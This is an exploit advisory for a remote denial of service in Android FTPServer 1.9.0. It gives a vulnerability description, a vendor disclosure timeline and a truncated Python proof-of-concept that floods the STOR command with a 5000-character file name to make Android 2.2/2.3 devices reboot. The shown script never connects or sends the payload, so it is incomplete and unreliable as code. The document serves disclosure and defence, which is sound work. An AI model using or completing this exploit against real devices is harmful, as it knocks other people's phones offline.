Android FTPServer 1.9.0 – Remote Denial of Service

  • 作者: G13
    日期: 2012-03-20
  • 类别:
  • 来源:
  • # Exploit Title: Android FTPServer 1.9.0 Remote DoS
    # Date: 03/20/12
    # Author: G13
    # Twitter: @g13net
    # Software Site:
    # Download Link:
    # Version: 1.9.0
    # Category: DoS (android)
    ##### Vulnerability #####
    FTPServer is vulnerable to a DoS condition when long file names are
    repeatedly attempted to be written via the STOR command.
    Successful exploitation will causes devices to restart.
    Android Security Team has confirmed this issue.
    I have been able to test this exploit against Android 2.2 and 2.3.
    4.0 (ICS) appears not to be vulnerable.
    ##### Vendor Timeline #####
    Android Security Team:
    10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will
    be looking into the issue
    10/21/11 - vendor Requests bug report from device, bug report sent, PoC
    Code Delivered to Vendor
    10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue
    on multiple devices
    10/25/11 - Vendor states they are still working on it
    10/30/11 - Current Status asked
    10/31/11 - vendor Replies no updates
    11/7/11 - Emailed Vendor, they ask for more clarification on issue. I
    submit more details
    11/8/11 - Vendor acknowledges that it is not the APK itself causing the
    crashes.Vendor also confirms full reboots from PoC code.
    11/9/11 - Vendor asks if I am just crashing application or device in
    certain instances.I state device is restarting.
    11/11/11 - I ask if there is anything more I may assist with.Vendor
    states they have isolated the impacted component and are working on a
    11/18/11 - Current status Asked.
    12/8/11 - Update requested, response that they will contact Kernel team for
    an update
    01/13/12 - Current status asked, no response
    03/06/12 - Current status asked, no response
    03/20/12 - Disclosure
    1/24/12 - Developer contacted
    1/25/12 - Developer Responds
    1/27/12 - Supplied Developer with PoC code, Developer confirms issue
    1/29/12 - Developer releases new version
    3/20/12 - Disclosure
    ##### PoC #####
    # Android FTPServer PoC Device Crash
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    buffer = "STOR " + "A" * 5000 + "\r\n"
    for x in xrange(1,31):
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     print x
     s.send("USER test\r\n")
     s.send("PASS test\r\n")